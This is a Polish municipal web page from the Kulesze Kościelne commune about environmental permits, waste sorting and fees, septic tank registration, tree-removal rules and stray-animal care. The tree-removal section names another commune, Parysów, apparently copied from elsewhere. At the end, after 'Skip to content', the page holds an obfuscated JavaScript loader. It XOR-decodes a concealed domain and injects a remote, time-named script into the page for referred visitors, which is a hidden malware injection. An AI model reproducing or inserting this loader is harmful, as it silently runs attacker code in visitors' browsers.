Ochrona środowiska i gospodarka odpadami

Kinga Trzaska

Tel. (+48 86) 4769 010 w. 22

e-mail:

Pokój nr 7

Informacje i druki do pobrania
Decyzja o uwarunkowaniach środowiskowych

Decyzja o uwarunkowaniach środowiskowych

Kogo dotyczy

Osoby fizyczne / osoby prawne

Wymagane dokumenty

 1. w przypadku przedsięwzięć mogących zawsze znacząco oddziaływać na środowisko – raport o oddziaływaniu przedsięwzięcia na środowisko, a w przypadku gdy wnioskodawca wystąpił o ustalenie zakresu raportu w trybie art. 69 – kartę informacyjną przedsięwzięcia;
 2. w przypadku przedsięwzięć mogących potencjalnie znacząco oddziaływać na środowisko – kartę informacyjną przedsięwzięcia;
 3. poświadczoną przez właściwy organ kopię mapy ewidencyjnej obejmującej przewidywany teren, na którym będzie realizowane przedsięwzięcie, oraz obejmującej przewidywany obszar, na który będzie oddziaływać przedsięwzięcie;
 4. mapę w skali zapewniającej czytelność przedstawionych danych z zaznaczonym przewidywanym terenem, na którym będzie realizowane przedsięwzięcie, oraz z zaznaczonym przewidywanym obszarem, na który będzie oddziaływać przedsięwzięcie, wraz z zapisem mapy w formie elektronicznej;
 5. w przypadku przedsięwzięć wymagających koncesji lub decyzji, o których mowa w art. 72 ust. 1 pkt 4-5, prowadzonych w granicach przestrzeni niestanowiącej części składowej nieruchomości gruntowej, przedsięwzięć dotyczących urządzeń piętrzących I, II i III klasy budowli oraz inwestycji w zakresie terminalu, zamiast kopii mapy, o której mowa w pkt 3 – mapę sytuacyjno-wysokościową sporządzoną w skali umożliwiającej szczegółowe przedstawienie przebiegu granic terenu, którego dotyczy wniosek, oraz obejmującą obszar, na który będzie oddziaływać przedsięwzięcie;
 6. wypis z rejestru gruntów lub inny dokument, wydany przez organ prowadzący ewidencję gruntów i budynków, pozwalający na ustalenie stron postępowania, zawierający co najmniej numer działki ewidencyjnej oraz, o ile zostały ujawnione: numer jej księgi wieczystej, imię i nazwisko albo nazwę oraz adres podmiotu ewidencyjnego, obejmujący przewidywany teren, na którym będzie realizowane przedsięwzięcie, oraz obejmujący obszar, na który będzie oddziaływać przedsięwzięcie;

Opłaty

205 zł płatne na konto:

Gmina Kulesze kościelne 94877400000010001620000010 (należy podać: za co opłata, imię i nazwisko, adres)

Tryb odwoławczy

Samorządowe Kolegium Odwoławcze w Łomży

Podstawa prawna

Ustawa z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. z 2021 r. poz. 247)

Dodatkowe informacje

Komórka odpowiedzialna Nr pokoju: 7

Nr telefonu: 864769010 w.22

Przejdź do zakładki Druki do pobrania

Gospodarka odpadami

Ogólne zasady odbioru odpadów

Odpady z terenu Gminy Kulesze Kościelne odbiera firma MPO Sp. z o.o. ul. 42 Pułku Piechoty 15-950 Białystok oddział w Wyszkach ul. Usługowa 11 17-132 Wyszki

Odpady komunalne należy przygotowywać do odbioru w pojemnikach przystosowanych do obsługi przez śmieciarkę lub w workach o pojemności 60 l -120 l.

Odpady należy segregować zgodnie z obowiązującymi zasadami:

 • worek w kolorze zielonym służy do gromadzenia szkła oraz szklanych opakowań;
 • worek w kolorze żółtym służy do zbiórki odpadów z tworzyw sztucznych, metalu oraz opakowań wielomateriałowych;
 • worek w kolorze niebieskim służy do gromadzenia papieru i tektury;
 • worek w kolorze brązowym służy do gromadzenia odpadów biodegradowalnych w tym odpadów zielonych;
 • pojemnik lub worek w kolorze czarnym służy do gromadzenia pozostałości po segregacji.

Baterii, akumulatorów oraz sprzętu elektronicznego i elektrycznego nie wolno wyrzucać do odpadów zmieszanych – są to odpady niebezpieczne. Można je oddać w punktach ich zakupu lub w PSZOK (punkcie selektywnej zbiórki odpadów komunalnych).

Przeterminowane leki należy wyrzucać do pojemników w aptekach lub w PSZOK.

Mieszkańcy sami wyposażają swoje nieruchomości w pojemniki i worki na pozostałości z sortowania.

Worki na odpady segregowane w kolorach zielony, żółtym, niebieskim i brązowym zapewnia Gmina w ramach opłaty za gospodarowanie odpadami komunalnymi.

W dniu odbioru odpadów muszą być one wystawione przed posesję od godziny 07:00 lub musi być zapewniony dostęp do altan śmietnikowych od strony drogi, ulicy.

Punkt selektywnej zbiórki odpadów komunalnych  (PSZOK) zlokalizowany przy ul. Nowy Świat 37 w Sokołach, czynny jest raz w tygodniu w soboty zgodnie z harmonogramem.

W punkcie przyjmowane są:

 1. papier w tym opakowania z papieru i tektury,
 2. tworzywa sztuczne w tym opakowania z tworzyw sztucznych;
 3. metale w tym opakowania z metali,
 4. odpady opakowaniowe wielomateriałowe,
 5. szkło w tym opakowania ze szkła,
 6. meble i odpady wielkogabarytowe, w tym wyposażenie wnętrz, wiadra, skrzynki, miski, zabawki, meble ogrodowe, doniczki itp.
 7. zużyte opony,
 8. bioodpady,
 9. tekstylia i odzież w tym opakowania z tekstyliów,
 10. przeterminowane leki i chemikalia,
 11. zużyte baterie i akumulatory,
 12. zużyty sprzęt elektryczny i elektroniczny, w tym: pralki, lodówki, telewizory, radioodbiorniki, komputery, kalkulatory, żarówki, lampy fluorescencyjne, świetlówki, lampy energooszczędne, termometry rtęciowe itp.,
 13. odpady niebezpieczne w tym: odpady farb i lakierów, rozpuszczalników, środków impregnacji drewna, olejów mineralnych i syntetycznych, benzyn, opakowania po środkach ochrony roślin, nawozach, opakowania po aerozolach,
 14. odpady budowalne i rozbiórkowe stanowiące odpady komunalne,
 15. żużel i popiół z palenisk i kotłów CO,
 16. odpady niekwalifikujące się do odpadów medycznych, powstałe w gospodarstwie domowym w wyniku przyjmowania produktów leczniczych w formie iniekcji i prowadzenia monitoringu poziomu substancji we krwi, w szczególności igły i strzykawki.

NOWA DEKLARACJA/ZMIANA DEKLARACJI

W przypadku nowo zamieszkałego budynku (nowy dom lub przeprowadzka do zakupionej nieruchomości), właściciel jest zobowiązany do złożenia deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi w terminie 14 dni od dnia zamieszkania pierwszego mieszkańca lub powstania na danej nieruchomości odpadów komunalnych.

W przypadku zmiany danych będących podstawą ustalenia wysokości należnej opłaty za gospodarowanie odpadami komunalnymi lub określonej w deklaracji ilości odpadów komunalnych powstających na danej nieruchomości, właściciel nieruchomości jest obowiązany złożyć nową deklarację w terminie do 10 dnia miesiąca następującego po miesiącu, w którym nastąpiła zmiana. Opłatę za gospodarowanie odpadami komunalnymi w zmienionej wysokości uiszcza się za miesiąc, w którym nastąpiła zmiana.

Jeżeli zmniejszenie opłaty za gospodarowanie odpadami komunalnymi jest związane ze śmiercią mieszkańca, nową deklarację można złożyć w terminie do 6 miesięcy od dnia tego zdarzenia.

W szczególności zgłaszać należy zmianę ilości osób zamieszkujących nieruchomość:

– zamieszkanie nowej osoby (np. po zawarciu związku małżeńskiego);

– wyprowadzenie się osoby (należy dołączyć dokument potwierdzający opłacanie opłaty za gospodarowanie odpadami komunalnymi w innej Gminie);

– urodzenie dziecka;

– śmierć osoby;

– zmianę adresu zamieszkania osoby/osób;

– zamieszkanie w domu niezamieszkałym dotychczas;

– zamieszkanie w nowym budynku (niezależnie od tego czy został on oddany do użytku czy też nie);

– użytkowanie nieruchomości na cele rekreacyjno – wypoczynkowe;

– podjęcie działalności powodującej powstawanie odpadów komunalnych.

Zgłoszenie następuje poprzez podpisanie nowej deklaracji wraz z wyjaśnieniem, co jest przyczyną zmiany danych.

OBOWIĄZKI MIESZKAŃCA DOTYCZĄCE PŁATNOŚCI ZA ODPADY KOMUNALNE

Składający deklarację dokonuje obliczenia miesięcznej opłaty za odpady komunalne:

W przypadku nieruchomości zamieszkałych należy uwzględnić liczbę osób faktycznie zamieszkujących daną nieruchomość oraz odpowiednią stawkę opłaty:

– jeżeli odpady są zbierane i odbierane w sposób selektywny stawka opłaty od osoby wynosi 16 zł/osobę/ miesiąc.;

– jeżeli odpady są zbierane i odbierane w sposób selektywny a bioodpady są kompostowane stawka wynosi 15 zł/osobę/ miesiąc.

– jeżeli właściciel nieruchomości nie wypełnia obowiązku zbierania odpadów komunalnych w sposób selektywny stawka od osoby wynosi 32 zł.

Kwota opłaty za odbiór i zagospodarowanie odpadów komunalnych określona zostaje przez mieszkańca w momencie składania deklaracji i obowiązuje do czasu zmiany deklaracji lub zmiany stawki na terenie gminy Kulesze Kościelne.

Jeśli nastąpi zmiana stawki, wówczas Urząd poinformuje mieszkańca o wysokości nowej stawki i kwocie nowej miesięcznej opłaty.

Skutki niedopełnienia obowiązku segregacji odpadów:

 1. W przypadku niedopełnienia przez właściciela nieruchomości obowiązku selektywnego zbierania odpadów komunalnych, podmiot odbierający odpady komunalne przyjmuje je jako niesegregowane (zmieszane) odpady komunalne i powiadamia o tym wójta oraz właściciela nieruchomości.
 2. Wójt na podstawie powiadomienia, o którym mowa w ust. 1, wszczyna postępowanie w sprawie określenia wysokości opłaty za gospodarowanie odpadami komunalnymi.
 3. Wójt określa, w drodze decyzji, wysokość opłaty za gospodarowanie odpadami komunalnymi za miesiąc lub miesiące, (w przypadku nieruchomości, zamieszkałych lub niezamieszkałych na których powstają odpady komunalne), za rok (w przypadku nieruchomości wykorzystywanych na cele rekreacyjne), w których nie dopełniono obowiązku selektywnego zbierania odpadów komunalnych, stosując wysokość stawki opłaty podwyższonej,

Wpłat dokonujemy na indywidualny numer konta Gminy Kulesze Kościelne: 16877400000010001620000250

 1. W przypadku nieruchomości zamieszkałych, na których powstają odpady komunalne ratalnie w następujących  terminach:
 1. za miesiące styczeń, luty i marzec – do 15 marca;
 2. za miesiące kwiecień, maj i czerwiec – do 15 czerwca;
 3. za miesiące lipiec, sierpień i wrzesień – do 15 września;
 4. za miesiące październik, listopad i grudzień – do 15 grudnia.

 

BARDZO WAŻNE!

ZAŁOGI POJAZDÓW ODBIERAJĄCYCH ODPADY KOMUNALNE ZOSTAŁY ZOBOWIĄZANE DO PROWADZENIA KONTROLI ODBIERANYCH ODPADÓW W ZAKRESIE POPRAWNOŚCI PROWADZENIA ZADEKLAROWANEJ SELEKTYWNEJ ZBIÓRKI ODPADÓW.

Przypadki braku prowadzenia selektywnej zbiórki odpadów, pomimo jej zadeklarowania oraz niewłaściwe prowadzenie segregacji odpadów będzie zgłaszane przez Wykonawcę do Urzędu Gminy Kulesze Kościelne, w celu wszczęcia postępowania nakładającego podwyższenie opłaty.

UWAGI DOTYCZĄCE PRACY FIRMY ODBIERAJĄCEJ ODPADY (NP. O NIEODEBRANIU ODPADÓW) NALEŻY ZGŁASZAĆ DO URZĘDU GMINY NAJPÓŹNIEJ W TERMINIE 2 DNI ROBOCZYCH OD DNIA OSTATNIEJ ZBIÓRKI ODPADÓW.

Przejdź do zakładki Druki do pobrania

Zbiorniki bezodpływowe

Informujemy, że zgodnie z art. 3 ust.3 pkt 1 i 2 ustawy z dnia 13 września 1996r o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2021 poz. 888), gminy mają obowiązek prowadzenia ewidencji zbiorników bezodpływowych na nieczystości płynne (szamb) oraz ewidencji przydomowych oczyszczalni ścieków.

W związku z powyższym, mieszkańcy Naszej Gminy zostali poproszeni, o wypełnienie zgłoszenia dotyczącej posiadania zbiornika bezodpływowego oraz przydomowej oczyszczalni ścieków. Osoby, które nie wypełniły stosownego zgłoszenia proszone są o jej wypełnienie i niezwłoczne dostarczenie do Urzędu Gminy, pok. Nr 7 lub do sekretariatu. Jednocześnie informuję, że złożenie zgłoszenia jest obowiązkowe. Podczas przeprowadzania kontroli posiadanych zbiorników bezodpływowych, sprawdzane będą umowy oraz rachunki potwierdzające wywóz nieczystości ciekłych przez przedsiębiorców, którzy otrzymali zezwolenie Wójta Gminy, na prowadzenie działalności w zakresie opróżniania zbiorników bezodpływowych i transportu nieczystości ciekłych z terenu gminy.

Druki zgłoszenia dostępne są w Urzędzie Gminy pok. Nr 7

 

Wykaz firm posiadających zezwolenie na opróżnianie zbiorników bezodpływowych i transport nieczystości ciekłych:

Zakład Wodociągów, Kanalizacji i Energetyki Cieplnej Sp. z o.o., ul. 1 Maja 6, 18-200 Wysokie Mazowieckie, tel. 86/275 08 88, lub 86/275 20 45
Anastazja Bańska WC SERWIS Sp. z o.o.. Spółka Komandytowa, 41-808 Zabrze ul. Szybowa 2, tel. 32/278 45 31
Spółdzielnia Kółek Rolniczych w Sokołach, ul. Kolejowa 31, 18-218 Sokoły, tel. 86 476 31 24
TOI TOI Sp. z o.o. ul. Płochocińska 29, 03-044 Warszawa, tel. 22/6145979
mToilet Sp. z o.o. ul. Toruńska 31, 03-226 Warszawa, tel. 488488489
Usługi Transportowe Joanna Urbańska Dębniki 11, 18-312 Rutki Kossaki, tel. 503080352
Marta Sutkowska Przedsiębiorstwo Handlowo Usługowe Marbud, Żabiniec 5, 18-214 Klukowo, tel. 510246399

Wycinka Drzew

Informacja dotycząca usunięcia drzew i krzewów z terenu nieruchomości

Usunięcie drzewa lub krzewu z terenu nieruchomości może nastąpić:

 • po dokonaniu zgłoszenia przez właściciela nieruchomości, jeżeli Wójt Gminy Parysów nie wyraził sprzeciwu – w przypadku drzew lub krzewów, które rosną na nieruchomościach stanowiących własność osób fizycznych i są usuwane na cele niezwiązane z prowadzeniem działalności gospodarczej;
 • po uzyskaniu zezwolenia wydanego przez Wójta Gminy Parysów, jeśli jest ono wymagane.

ZGŁOSZENIE USUNIĘCIA DRZEW

W przypadku drzew lub krzewów, które rosną na nieruchomościach stanowiących własność osób fizycznych i są usuwane na cele niezwiązane z prowadzeniem działalności gospodarczej, właściciel nieruchomości jest obowiązany dokonać zgłoszenia do Urzędu Gminy w Parysowie zamiaru usunięcia drzewa, jeżeli obwód pnia drzewa mierzonego na wysokości 5 cm przekracza:

1)  80 cm – w przypadku topoli, wierzb, klonu jesionolistnego oraz klonu srebrzystego;

2)  65 cm – w przypadku kasztanowca zwyczajnego, robinii akacjowej oraz platanu klonolistnego;

3)  50 cm – w przypadku pozostałych gatunków drzew.

Zgłoszenie zawiera imię i nazwisko wnioskodawcy, oznaczenie nieruchomości, z której drzewo ma być usunięte, oraz rysunek albo mapkę określającą usytuowanie drzewa na nieruchomości.

Zgłoszenie do pobrania – druk

W terminie 21 dni od dnia doręczenia zgłoszenia pracownik Urzędu Gminy dokonuje oględzin drzewa.

Usunięcie drzewa może nastąpić, jeżeli Wójt Gminy nie wniósł sprzeciwu w terminie 14 dni od dnia oględzin.

W przypadku nieusunięcia drzewa przed upływem 6 miesięcy od przeprowadzonych oględzin usunięcie drzewa może nastąpić po dokonaniu ponownego zgłoszenia.

ZEZWOLENIE NA USUNIĘCIE DRZEW LUB KRZEWÓW

Usunięcie drzewa lub krzewu z terenu nieruchomości może nastąpić po uzyskaniu zezwolenia wydanego przez wójta, burmistrza albo prezydenta miasta na wniosek:

1) posiadacza nieruchomości – za zgodą właściciela tej nieruchomości;

2) właściciela urządzeń, o których mowa w art. 49 § 1 ustawy z dnia 23 kwietnia 1964 r. – Kodeks cywilny, zwanej dalej „Kodeksem cywilnym” – jeżeli drzewo lub krzew zagrażają funkcjonowaniu tych urządzeń.

Zgoda właściciela nieruchomości nie jest wymagana w przypadku wniosku złożonego przez:

1) użytkownika wieczystego lub posiadacza nieruchomości o nieuregulowanym stanie prawnym;

2) spółdzielnię mieszkaniową;

3) wspólnotę mieszkaniową, w której właściciele lokali powierzyli zarząd nieruchomością wspólną zarządowi;

4) zarządcę nieruchomości będącej własnością Skarbu Państwa.

WNIOSEK O WYDANIE ZEZWOLENIA NA USUNIĘCIE DRZEW (pobierz)

Do wniosku należy dołączyć:

1) Zgodę właściciela (nie dotyczy właściciela nieruchomości, użytkownika wieczystego, posiadacza nieruchomości o nieuregulowanym stanie prawnym)

2) Zgody pozostałych współwłaścicieli nieruchomości (w przypadku współwłasności);

3) Rysunek lub mapa określające usytuowanie drzewa lub krzewu w odniesieniu do granic nieruchomości i obiektów budowlanych istniejących lub projektowanych na tej nieruchomości albo projekt zagospodarowania działki lub terenu wykonany przez projektanta posiadającego odpowiednie uprawnienia budowlane;

4) Projekt planu nasadzeń zastępczych (jeżeli są planowane), w liczbie nie mniejszej niż liczba usuwanych drzew lub o powierzchni nie mniejszej niż powierzchnia usuwanych krzewów wykonany w formie rysunku, mapy lub projektu zagospodarowania działki lub terenu, oraz informację o liczbie, gatunku lub odmianie drzew lub krzewów oraz miejscu i planowanym terminie ich wykonania;

5) Projekt planu przesadzenia drzewa lub krzewu (jeżeli jest planowane) wykonany w formie rysunku, mapy lub projektu zagospodarowania działki lub terenu, oraz informację o miejscu i planowanym terminie ich wykonania;

6) Decyzję o środowiskowych uwarunkowaniach albo postanowienie w sprawie uzgodnienia warunków realizacji przedsięwzięcia w zakresie oddziaływania na obszar Natura 2000, w przypadku realizacji przedsięwzięcia, dla którego wymagane jest ich uzyskanie zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko oraz postanowienie uzgadniające wydawane przez właściwego regionalnego dyrektora ochrony środowiska w ramach ponownej oceny oddziaływania na środowisko, jeżeli jest wymagana lub została przeprowadzona na wniosek realizującego przedsięwzięcie;

7) Zezwolenie w stosunku do gatunków chronionych, (jeżeli zostało wydane;)

8) Pełnomocnictwo, jeżeli pełnomocnik został ustanowiony.

UZYSKANIE POZWOLENIA NIE JEST WYMAGANE M.IN. NA USUNIĘCIE DRZEW LUB KRZEWÓW:

1) krzewu albo krzewów rosnących w skupisku, o powierzchni do 25 m2;

2)  krzewów na terenach pokrytych roślinnością pełniącą funkcje ozdobne, urządzoną pod względem rozmieszczenia i doboru gatunków posadzonych roślin, z wyłączeniem krzewów w pasie drogowym drogi publicznej, na terenie nieruchomości wpisanej do rejestru zabytków oraz na terenach zieleni;

3)  drzew, których obwód pnia na wysokości 5 cm nie przekracza:

a)  80 cm – w przypadku topoli, wierzb, klonu jesionolistnego oraz klonu srebrzystego,

b)  65 cm – w przypadku kasztanowca zwyczajnego, robinii akacjowej oraz platanu klonolistnego,

c)  50 cm – w przypadku pozostałych gatunków drzew;

3a)  drzew lub krzewów, które rosną na nieruchomościach stanowiących własność osób fizycznych i są usuwane na cele niezwiązane z prowadzeniem działalności gospodarczej;

3b)  drzew lub krzewów usuwanych w celu przywrócenia gruntów nieużytkowanych do użytkowania rolniczego;

4)  drzew lub krzewów na plantacjach lub w lasach w rozumieniu ustawy z dnia 28 września 1991 r. o lasach;

5)  drzew lub krzewów owocowych, z wyłączeniem rosnących na terenie nieruchomości wpisanej do rejestru zabytków lub na terenach zieleni;

6)  drzew lub krzewów usuwanych w związku z funkcjonowaniem ogrodów botanicznych lub zoologicznych;

7)  drzew lub krzewów usuwanych na podstawie decyzji właściwego organu z obszarów położonych między linią brzegu a wałem przeciwpowodziowym lub naturalnym wysokim brzegiem, w który wbudowano trasę wału przeciwpowodziowego, z wału przeciwpowodziowego i terenu w odległości mniejszej niż 3 m od stopy wału;

8)  drzew lub krzewów, które utrudniają widoczność sygnalizatorów i pociągów, a także utrudniają eksploatację urządzeń kolejowych albo powodują tworzenie na torowiskach zasp śnieżnych, usuwanych na podstawie decyzji właściwego organu;

9)  drzew lub krzewów stanowiących przeszkody lotnicze, usuwanych na podstawie decyzji właściwego organu;

10)  drzew lub krzewów usuwanych na podstawie decyzji właściwego organu ze względu na potrzeby związane z utrzymaniem urządzeń melioracji wodnych szczegółowych;

11)  drzew lub krzewów usuwanych z obszaru parku narodowego lub rezerwatu przyrody nieobjętego ochroną krajobrazową;

12)  drzew lub krzewów usuwanych w ramach zadań wynikających z planu ochrony lub zadań ochronnych parku narodowego lub rezerwatu przyrody, planu ochrony parku krajobrazowego, albo planu zadań ochronnych lub planu ochrony dla obszaru Natura 2000;

13)  prowadzenia akcji ratowniczej przez jednostki ochrony przeciwpożarowej lub inne właściwe służby ustawowo powołane do niesienia pomocy osobom w stanie nagłego zagrożenia życia lub zdrowia;

14)  drzew lub krzewów stanowiących złomy lub wywroty usuwanych przez:

a)  jednostki ochrony przeciwpożarowej, jednostki Sił Zbrojnych Rzeczypospolitej Polskiej, właścicieli urządzeń, o których mowa w art. 49 § 1 Kodeksu cywilnego, zarządców dróg, zarządców infrastruktury kolejowej, gminne lub powiatowe jednostki oczyszczania lub inne podmioty działające w tym zakresie na zlecenie gminy lub powiatu,

b)  inne podmioty lub osoby, po przeprowadzeniu oględzin przez organ właściwy do wydania zezwolenia na usunięcie drzewa lub krzewu, potwierdzających, że drzewa lub krzewy stanowią złom lub wywrot;

15)  drzew lub krzewów należących do gatunków obcych, określonych w przepisach wydanych na podstawie art. 120 ust. 2f.

Podstawa prawna:

Ustawa z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz. U. z 2020 r. poz. 55)

Przejdź do zakładki Druki do pobrania

Opieka nad zwierzętami i zapobieganie bezdomności

Opieka nad zwierzętami i zapobieganie bezdomności

Opieka nad bezdomnymi zwierzętami

Apelujemy do mieszkańców Gminy Kulesze Kościelne  o zwrócenie uwagi na problem  bezdomności zwierząt.

Należy pamiętać, że zwierzęta w większości przypadków mają swoich właścicieli, a pojawiające się „bezdomne psy”, to głównie zwierzęta nieodpowiednio dopilnowane przez właściciela lub faktycznie porzucone przez bezdusznych opiekunów.

Z uzyskanych informacji i obserwacji wynika, iż w większości przypadków psy zgłaszane do odbioru nie są bezpańskie. Są to psy, które oddaliły się z okolicznych domów przez nierozwagę swoich właścicieli. Zdarza się to często w okresie godowym zwierząt.

Czynnikiem wskazującym na „bezpańskość” czy „bezdomność” psa nie może być tylko fakt, że zwierzę pojawia się o odpowiednich porach w danej okolicy, bowiem takie przypadki są szczególnie liczne w okresie godowym zwierząt. Wówczas watahy psów potrafią „pilnować” nieruchomości, na terenie której przebywa suka. Niekiedy sytuacja ta trwa do tygodnia, albo i dłużej.

W tym czasie (wiosna i wczesna jesień) niewskazane jest jakiekolwiek dokarmianie wałęsających się psów oraz nadgorliwe interweniowanie w ich sprawie w Urzędzie Gminy. Osoby, które zauważyły w pobliżu swojej posesji wałęsającego się psa nie powinny zamykać go na terenie swojej nieruchomości. W konsekwencji może to doprowadzić do tego, że psy nie będą wracać do swoich posesji. Zwierzę – o ile nie będzie dokarmiane – w końcu samo opuści posesję i  wróci do swojego właściciela. Pamiętajmy, aby nie odbierać psu szansy powrotu do domu!

Gminny program opieki nad zwierzętami bezdomnymi oraz zapobieganiu bezdomności zwierząt  znajduje się w zakładce   Druki do Pobrania
Zgodnie z art. 11 ust. 1 ustawy z dnia 21 sierpnia 1997 r. o ochronie zwierząt (tekst jedn. Dz. U. z 2022 r. poz. 572 z późn. zm.) zapewnienie opieki bezdomnym zwierzętom oraz ich wyłapywanie należy do zadań własnych gminy. Wobec powyższego rada gminy wypełniając ww. obowiązek określa w drodze uchwały corocznie program opieki nad zwierzętami bezdomnymi oraz zapobiegania bezdomności zwierząt. Program ten obejmuje:
 • Zapewnienie bezdomnym zwierzętom miejsca w schronisku;
 • Opiekę nad wolno żyjącymi kotami, w tym ich dokarmianie;
 • Odławianie bezdomnych zwierząt;
 • Obligatoryjną sterylizację albo kastrację zwierząt w schroniskach dla zwierząt;
 • Poszukiwanie właścicieli dla bezdomnych zwierząt;
 • Usypianie ślepych miotów;
 • Wskazanie gospodarstwa rolnego w celu zapewnienia miejsca dla zwierząt gospodarskich;
 • Zapewnienie całodobowej opieki weterynaryjnej w przypadkach zdarzeń drogowych z udziałem zwierząt.
Koszty realizacji programu ponosi gmina.

Jak zgłosić bezdomne zwierzę?

 • W przypadku, gdy właściciel wałęsającego się zwierzęcia jest znany, należy fakt ten zgłosić bezzwłocznie na Posterunek Policji w Sokołach. Policja ma prawo nałożyć wówczas mandat na nieodpowiedzialnego właściciela,
 • W sytuacji, kiedy mamy faktyczne podejrzenie, że zwierzę jest bezpańskie, ale nie stwarza zagrożenia dla mieszkańców, wówczas należy zgłoszenia kierować telefonicznie lub osobiście do sołtysa danej miejscowości. Sołtys po ustaleniu czy zwierzę rzeczywiście nie ma właściciela, przekazuje informację o zgłoszeniu do Urzędu Gminy. Jeśli okaże się, iż zgłoszone i  zabrane zwierzę miało właściciela, zostanie on obciążony kosztami odbioru i utrzymania go w schronisku,
 • W sytuacji, kiedy mamy faktyczne podejrzenie, iż zwierzę jest bezpańskie i    jednocześnie jest spełniony jeden z warunków:
  • zwierzę zagraża bezpieczeństwu mieszkańców (np. gdy jest agresywne),
  • zwierzę jest ranne,
  • został znaleziony „ślepy miot” bez matki zwierząt,

należy bezzwłocznie taki fakt zgłosić do:

 • Urzędu Gminy w Kulesze Kościelne –w godzinach 8:00-16:00,od poniedziałku do piątku

Przekazując zgłoszenie do Urzędu Gminy lub  sołtysa należy podać:

 • swoje dane osobowe,
 • miejsce przebywania zwierzęcia,
 • nr telefonu kontaktowego.

Po takim zgłoszeniu Urząd Gminy podejmie interwencję dotyczącą wyłapania zwierzęcia.

Opiekę nad bezdomnymi zwierzętami z terenu Gminy Kulesze Kościelne w terminie od 1 stycznia 2023 roku do 31 grudnia 2023 r. sprawuje Schronisko dla Bezdomnych Zwierząt Green House w Krzeczkowie (tu link do strony schroniska  http://www.schronisko-gh.pl/portfolio/gmina-kulesze-koscielne/ ) .

Możliwość adopcji zwierząt ze schroniska

Najlepszą formą pomocy zwierzętom ze schroniska jest ich adopcja. Żadne, nawet najlepsze schronisko nie zastąpi im prawdziwego, kochającego domu. Dla bezdomnych zwierząt adopcja jest jedyną szansą na drugie, lepsze życie.

ADOPTUJ PRZYJACIELA  ZE SCHRONISKA  TEL. 604798164

Koty wolno żyjące, to koty urodzone lub żyjące na wolności, w stanie dzikim, w otoczeniu człowieka, bytujące głównie w piwnicach budynków mieszkalnych, są elementem ekosystemu, a ich obecność zapobiega rozprzestrzenianiu się myszy i szczurów. Koty te nie są zwierzętami bezdomnymi w rozumieniu ustawy o ochronie zwierząt z dnia 21 sierpnia 1997 r., dlatego nie należy ich wyłapywać, wywozić ani utrudniać im bytowania w danym miejscu.  Obowiązek pomocy kotom wolno żyjącym wynika z przepisów ustawy o ochronie zwierząt z dnia 21 sierpnia 1997 r.

Kilka spraw pod rozwagę

Prosimy mieszkańców Gminy Kulesze Kościelne o skuteczne zabezpieczenie furtek, bram i   ogrodzeń posesji, tak by zwierzęta, głównie psy nie mogły jej opuszczać bez wiedzy właściciela. Przypominamy, że zgodnie z Kodeksem Wykroczeń „Kto nie zachowuje zwykłych lub nakazowych środków ostrożności przy trzymaniu zwierząt, podlega karze ograniczenia wolności, grzywny do 1000 złotych albo karze nagany.

Ponadto informujemy, że zgłoszenia odbioru zwierzęcia jako bezdomnego, od mieszkańców, którzy zapewnili wałęsającemu się psu schronienie oraz wyżywienie na terenie swojej nieruchomości, nie będą przyjmowane. Należy pamiętać, że osoba przyjmująca psa do swojego domu, zapewniająca mu opiekę i  wyżywienie staje się jego właścicielem. Nie można zapominać także o tym, że w  większości przypadków „wałęsające się psy” mają właścicieli, jednak szybko przyzwyczajają się do miejsca, w którym zapewniono im wyżywienie.

 

Ogłoszenia

Światowy Dzień Ziemi – Edukacja ekologiczna

Co roku 22 kwietnia, na całym świecie obchodzone jest wyjątkowe święto – Międzynarodowy Dzień Ziemi. W tym ważnym dniu powinniśmy wszyscy, choć przez chwilę pomyśleć o planecie, na której żyjemy i o otaczającej nas przyrodzie. Uczniowie klasy II naszej szkoły chcąc...

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);